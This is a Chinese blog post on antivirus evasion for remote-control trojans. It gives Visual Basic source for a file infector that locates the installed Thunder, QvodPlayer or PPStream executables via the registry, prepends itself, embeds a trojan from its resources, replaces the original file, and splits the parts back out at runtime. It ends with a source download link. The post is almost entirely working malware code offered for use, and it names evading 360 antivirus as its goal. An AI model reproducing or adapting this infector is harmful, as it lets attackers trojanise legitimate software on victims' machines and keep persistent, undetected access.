远控免杀之破杀软自启动

以前买了本书《终极免杀》,书还不错,主要是看中了360免杀的专题。里面就讲了这个方法来自启动。
思路如下:
查找系统指定软件路径(用注册表),然后把木马与主程序捆绑并替换。有些程序会自身检测。这个就要靠你自己了。

源码中的资源文件放木马,源码感染的是迅雷,当然你可以改成别的!
核心模块代码;

Function GanRanExe(ByVal sFilePath As String)
  Dim MyArray() As Byte
  Dim CurrentSize As Long
  Dim FileArray() As Byte, FileArray1() As Byte
  Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
    ReDim MyArray(LOF(1) - 1)
    Get #1, , MyArray
  Close #1
  Open sFilePath For Binary Access Read As #1
    ReDim FileArray(LOF(1) - 1)
    Get #1, , FileArray
  Close #1
  FileArray1 = LoadResData(101, "CUSTOM")
  Kill sFilePath
  Open sFilePath For Binary Access Write As #1
    Put #1, , MyArray
    Put #1, , FileArray
    CurrentSize = LOF(1)
    Put #1, , FileArray1
    Put #1, , "GanRanFileTbide" & UBound(MyArray) + 1 & "," & UBound(FileArray) + 1 & "," & CurrentSize & "," & UBound(FileArray1) + 1
  Close #1
End Function

Function FenLiGanRanExe(ByVal FenLiToFilePath As String)
 On Error Resume Next
  Dim MyArray() As Byte
  Dim FileArray() As Byte
  Dim FenLiXinXi() As String
  Dim FenLiXinXiSize() As String
  Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
    ReDim MyArray(LOF(1) - 1)
    Get #1, , MyArray
    FenLiXinXi = Split(StrConv(MyArray, vbUnicode), "GanRanFileTbide")
    FenLiXinXiSize = Split(FenLiXinXi(UBound(FenLiXinXi)), ",")
    ReDim FileArray(FenLiXinXiSize(1) - 1)
    Get #1, FenLiXinXiSize(0) + 1, FileArray
  Close #1

  Kill FenLiToFilePath
  Open FenLiToFilePath For Binary Access Write As #1
    Put #1, 1, FileArray
  Close #1
End Function

Function FenLiGanRanExe1(ByVal FenLiToFilePath As String)
 On Error Resume Next
  Dim MyArray() As Byte
  Dim FileArray() As Byte
  Dim FenLiXinXi() As String
  Dim FenLiXinXiSize() As String
  Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
    ReDim MyArray(LOF(1) - 1)
    Get #1, , MyArray
    FenLiXinXi = Split(StrConv(MyArray, vbUnicode), "GanRanFileTbide")
    FenLiXinXiSize = Split(FenLiXinXi(UBound(FenLiXinXi)), ",")
    ReDim FileArray(FenLiXinXiSize(3) - 1)
    Get #1, FenLiXinXiSize(2) + 1, FileArray
  Close #1

  Kill FenLiToFilePath
  Open FenLiToFilePath For Binary Access Write As #1
    Put #1, 1, FileArray
  Close #1
End Function

Function TestGanRan(ByVal sFilePath As String) As Boolean
 Dim FileArray() As Byte
 Open sFilePath For Binary Access Read As #1
    ReDim FileArray(LOF(1) - 1)
    Get #1, , FileArray
  Close #1
  If InStr(StrConv(FileArray, vbUnicode), "GanRanFileTbide") > 0 Then
     TestGanRan = True
    Else
     TestGanRan = False
  End If

End Function

Public Function ReadReg(ByVal hKey)
On Error Resume Next
 Set pReg = CreateObject("Wscript.Shell")
  ReadReg = pReg.RegRead(hKey)
End Function
Function PanDuanpath() As Boolean
 On Error Resume Next
  Dim thunderPath
  thunderPath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Thunder Network\ThunderOem\thunder_backwnd\dir")
   If Dir(thunderPath & "\Program\Thunder.exe") <> "" Then
   FrmMain.Combo1.AddItem thunderPath
   FrmMain.Combo1.Text = thunderPath
   Else
   End If

Dim Qvodpath
Qvodpath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\QvodPlayer\Insert\Insertpath")
   If Dir(Qvodpath & "/QvodPlayer.exe") <> "" Then
   FrmMain.Combo1.AddItem Qvodpath
   FrmMain.Combo1.Text = Qvodpath
   Else
   End If

Dim PPSpath
PPSpath = ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PPStream.exe\Path")
   If Dir(PPSpath & "/PPStream.exe") <> "" Then
   FrmMain.Combo1.AddItem PPSpath
   FrmMain.Combo1.Text = PPSpath
   Else
   End If
 End Function

源码下载

下载地址

还没有评论,快来抢沙发!

发表评论

  • 😉
  • 😐
  • 😡
  • 😈
  • 😯
  • 😛
  • 😳
  • 😮
  • 😆
  • 💡
  • 😀
  • 👿
  • 😥
  • 😎
  • 😕